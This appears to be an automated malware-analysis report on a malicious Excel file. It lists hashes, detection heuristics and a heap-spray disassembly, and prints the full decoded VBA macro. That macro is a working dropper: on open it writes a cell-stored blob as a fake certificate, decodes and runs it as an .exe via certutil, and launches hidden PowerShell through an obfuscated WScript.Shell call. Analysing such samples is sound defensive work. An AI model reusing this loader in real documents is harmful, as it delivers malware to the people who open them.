Office (OLE) malware analysis — malicious · 785f7c9516070deb

MALICIOUS

Office (OLE)

739.0 KB Created: 2018-06-29 06:15:07 Authoring application: Microsoft Excel First seen: 2019-04-18

MD5: ed79d7e4599e2026e36c4b267b75f3c9 SHA-1: a6b6315145a97575ff06bbc125732279dd714505 SHA-256: 785f7c9516070deb785fc9ff369b69729879412129b197e84f99c2d5aed7485e

428 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1140 Deobfuscate or Obfuscate

The sample is an Excel file containing obfuscated VBA macros. The Auto_Open macro triggers the execution of a command constructed from concatenated string literals, which is then run using 'WsCrip' + 't.' + 'Sh' + 'ell'. This indicates the macro is designed to download and execute a second-stage payload, a common technique for malware delivery. The presence of heap spray and obfuscated auto-execution loaders further supports this assessment.

Heuristics 10

ClamAV: Xls.Malware.Valyria-6735731-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Malware.Valyria-6735731-0
VBA macros detected medium 6 related findings OLE_VBA_MACROS

Document contains VBA macro code

Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA

Matched line in script

    Shell (Chr(99) & Chr(101) & Chr(114) & Chr(116) & Chr(117) & Chr(116) & Chr(105) & Chr(108) & Chr(32) & _
    Chr(45) & Chr(100) & Chr(101) & Chr(99) & Chr(111) & Chr(100) & Chr(101) & Chr(32) & path & " " & expath)

Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
Matched line in script
```
    c = Chr(112) & Chr(79) & Chr(119) & Chr(69) & Chr(114) & Chr(83) & Chr(104) & Chr(69) & Chr(108) & Chr(76) & Chr(46) & Chr(101) & Chr(120) & Chr(69) & " -nop -noni -windowstyle 1 -command " & Chr(34) & x & Chr(34)
    Set s = CreateObject("WsCrip" & "t." & "Sh" & "ell")
    s.Run c, 0
```
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION

VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
Matched line in script
```
    c = Chr(112) & Chr(79) & Chr(119) & Chr(69) & Chr(114) & Chr(83) & Chr(104) & Chr(69) & Chr(108) & Chr(76) & Chr(46) & Chr(101) & Chr(120) & Chr(69) & " -nop -noni -windowstyle 1 -command " & Chr(34) & x & Chr(34)
    Set s = CreateObject("WsCrip" & "t." & "Sh" & "ell")
    s.Run c, 0
```

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

    c = Chr(112) & Chr(79) & Chr(119) & Chr(69) & Chr(114) & Chr(83) & Chr(104) & Chr(69) & Chr(108) & Chr(76) & Chr(46) & Chr(101) & Chr(120) & Chr(69) & " -nop -noni -windowstyle 1 -command " & Chr(34) & x & Chr(34)
    Set s = CreateObject("WsCrip" & "t." & "Sh" & "ell")
    s.Run c, 0

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Auto_Open macro low OLE_VBA_AUTO

Auto_Open macro
Matched line in script
```
Attribute VB_Name = "Module1"
Sub Auto_Open()
```

Heap-spray pattern detected high SC_HEAP_SPRAY

Repeated 0x41 (A) bytes found

Disassembly

Attempted x86 opcode disassembly

0000379B  41                inc ecx
0000379C  41                inc ecx
0000379D  41                inc ecx
0000379E  41                inc ecx
0000379F  41                inc ecx
000037A0  41                inc ecx
000037A1  41                inc ecx
000037A2  41                inc ecx
000037A3  41                inc ecx
000037A4  41                inc ecx
000037A5  41                inc ecx
000037A6  41                inc ecx
000037A7  41                inc ecx
000037A8  41                inc ecx
000037A9  41                inc ecx
000037AA  41                inc ecx
000037AB  41                inc ecx
000037AC  41                inc ecx
000037AD  41                inc ecx
000037AE  41                inc ecx
000037AF  41                inc ecx
000037B0  41                inc ecx
000037B1  41                inc ecx
000037B2  41                inc ecx
000037B3  41                inc ecx
000037B4  41                inc ecx
000037B5  41                inc ecx
000037B6  41                inc ecx
000037B7  41                inc ecx
000037B8  41                inc ecx
000037B9  41                inc ecx
000037BA  41                inc ecx
000037BB  41                inc ecx
000037BC  41                inc ecx
000037BD  41                inc ecx
000037BE  41                inc ecx
000037BF  41                inc ecx
000037C0  41                inc ecx
000037C1  41                inc ecx
000037C2  41                inc ecx
000037C3  41                inc ecx
000037C4  41                inc ecx
000037C5  41                inc ecx
000037C6  41                inc ecx
000037C7  41                inc ecx
000037C8  41                inc ecx
000037C9  41                inc ecx
000037CA  41                inc ecx
000037CB  41                inc ecx
000037CC  41                inc ecx
000037CD  41                inc ecx
000037CE  41                inc ecx
000037CF  41                inc ecx
000037D0  41                inc ecx
000037D1  41                inc ecx
000037D2  41                inc ecx
000037D3  41                inc ecx
000037D4  41                inc ecx
000037D5  41                inc ecx
000037D6  41                inc ecx
000037D7  41                inc ecx
000037D8  41                inc ecx
000037D9  41                inc ecx
000037DA  41                inc ecx
000037DB  41                inc ecx
000037DC  41                inc ecx
000037DD  41                inc ecx
000037DE  41                inc ecx
000037DF  41                inc ecx
000037E0  41                inc ecx
000037E1  41                inc ecx
000037E2  41                inc ecx
000037E3  41                inc ecx
000037E4  41                inc ecx
000037E5  41                inc ecx
000037E6  41                inc ecx
000037E7  41                inc ecx
000037E8  41                inc ecx
000037E9  41                inc ecx
000037EA  41                inc ecx
000037EB  41                inc ecx
000037EC  41                inc ecx
000037ED  41                inc ecx
000037EE  41                inc ecx
000037EF  41                inc ecx
000037F0  41                inc ecx
000037F1  41                inc ecx
000037F2  41                inc ecx
000037F3  41                inc ecx
000037F4  41                inc ecx
000037F5  41                inc ecx
000037F6  41                inc ecx
000037F7  41                inc ecx
000037F8  41                inc ecx
000037F9  41                inc ecx
000037FA  41                inc ecx

Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LURE

Document gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3152 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	3152 bytes
SHA-256: `09b09250c2afb56f15166ea14ea6ae863ff8ee95e1d026b001b74cb08348a4cb`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Module1" Sub Auto_Open() Call LinesOfBusiness.dR8tWCNt Call GgUWAG2c End Sub Function GetVal(sr As Long, er As Long, c As Long) Dim x For i = sr To er x = x + Cells(i, c) Next GetVal = x End Function Sub GgUWAG2c() Dim x, c As String x = GetVal(4269, 4269, 246) x = Replace(x, """", "\""") c = Chr(112) & Chr(79) & Chr(119) & Chr(69) & Chr(114) & Chr(83) & Chr(104) & Chr(69) & Chr(108) & Chr(76) & Chr(46) & Chr(101) & Chr(120) & Chr(69) & " -nop -noni -windowstyle 1 -command " & Chr(34) & x & Chr(34) Set s = CreateObject("WsCrip" & "t." & "Sh" & "ell") s.Run c, 0 End Sub Attribute VB_Name = "LinesOfBusiness" #If VBA7 Then Public Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As LongPtr) #Else Public Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long) #End If Function GetVal(sr As Long, er As Long, c As Long) Dim x For i = sr To er x = x + Cells(i, c) Next GetVal = x End Function Function GetRand() Dim r As String Dim i As Integer Randomize For i = 1 To 8 If i Mod 2 = 0 Then r = Chr(Int((90 - 65 + 1) * Rnd + 65)) & r Else r = Int((9 * Rnd) + 1) & r End If Next i GetRand = r End Function Sub cutil(code As String) Dim x As String x = "-----BEG" & "IN CER" & "TIFICATE-----" x = "-----BEG" & "IN CER" & "TIFI" & "CATE-----" x = x + vbNewLine x = x + code x = x + vbNewLine x = x + "-----E" & "ND CERTIF" & "ICATE-----" Dim path As String path = Application.UserLibraryPath & rndname & ".txt" expath = Application.UserLibraryPath & rndname & ".exe" Set scr = CreateObject("Scr" & "ipting.FileSy" & "stemObject") path = Application.UserLibraryPath & GetRand & ".txt" expath = Application.UserLibraryPath & GetRand & ".exe" Set scr = CreateObject("Scr" & "ipting.FileSy" & "stemOb" & "ject") Set file = scr.CreateTextFile(path, True) file.Write x file.Close Shell (Chr(99) & Chr(101) & Chr(114) & Chr(116) & Chr(117) & Chr(116) & Chr(105) & Chr(108) & Chr(32) & _ Chr(45) & Chr(100) & Chr(101) & Chr(99) & Chr(111) & Chr(100) & Chr(101) & Chr(32) & path & " " & expath) Sleep 2000 Shell (expath) End Sub Sub dR8tWCNt() Dim p As String p = GetVal(3167, 3253, 176) cutil (p) End Sub

SHA-256: 09b09250c2afb56f15166ea14ea6ae863ff8ee95e1d026b001b74cb08348a4cb

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub Auto_Open()

    Call LinesOfBusiness.dR8tWCNt

    Call GgUWAG2c

End Sub


Function GetVal(sr As Long, er As Long, c As Long)
    Dim x
    For i = sr To er
        x = x + Cells(i, c)
    Next
    GetVal = x
End Function


Sub GgUWAG2c()
    Dim x, c As String
    x = GetVal(4269, 4269, 246)
    x = Replace(x, """", "\""")
    c = Chr(112) & Chr(79) & Chr(119) & Chr(69) & Chr(114) & Chr(83) & Chr(104) & Chr(69) & Chr(108) & Chr(76) & Chr(46) & Chr(101) & Chr(120) & Chr(69) & " -nop -noni -windowstyle 1 -command " & Chr(34) & x & Chr(34)
    Set s = CreateObject("WsCrip" & "t." & "Sh" & "ell")
    s.Run c, 0
End Sub



Attribute VB_Name = "LinesOfBusiness"

#If VBA7 Then
    Public Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As LongPtr)
#Else
    Public Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
#End If


Function GetVal(sr As Long, er As Long, c As Long)
    Dim x
    For i = sr To er
        x = x + Cells(i, c)
    Next
    GetVal = x
End Function


Function GetRand()
    Dim r As String
    Dim i As Integer
     
    Randomize
    For i = 1 To 8
        If i Mod 2 = 0 Then
            r = Chr(Int((90 - 65 + 1) * Rnd + 65)) & r
        Else
            r = Int((9 * Rnd) + 1) & r
        End If
    Next i
    GetRand = r
End Function


Sub cutil(code As String)
    Dim x As String
    
    x = "-----BEG" & "IN CER" & "TIFICATE-----"
    x = "-----BEG" & "IN CER" & "TIFI" & "CATE-----"
    x = x + vbNewLine
    x = x + code
    x = x + vbNewLine
    x = x + "-----E" & "ND CERTIF" & "ICATE-----"
    
    Dim path As String
    path = Application.UserLibraryPath & rndname & ".txt"
    expath = Application.UserLibraryPath & rndname & ".exe"
    
    Set scr = CreateObject("Scr" & "ipting.FileSy" & "stemObject")
    path = Application.UserLibraryPath & GetRand & ".txt"
    expath = Application.UserLibraryPath & GetRand & ".exe"
    
    Set scr = CreateObject("Scr" & "ipting.FileSy" & "stemOb" & "ject")
    Set file = scr.CreateTextFile(path, True)
    file.Write x
    file.Close

    Shell (Chr(99) & Chr(101) & Chr(114) & Chr(116) & Chr(117) & Chr(116) & Chr(105) & Chr(108) & Chr(32) & _
    Chr(45) & Chr(100) & Chr(101) & Chr(99) & Chr(111) & Chr(100) & Chr(101) & Chr(32) & path & " " & expath)
    Sleep 2000
    Shell (expath)
End Sub


Sub dR8tWCNt()
    Dim p As String
    p = GetVal(3167, 3253, 176)
    cutil (p)
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.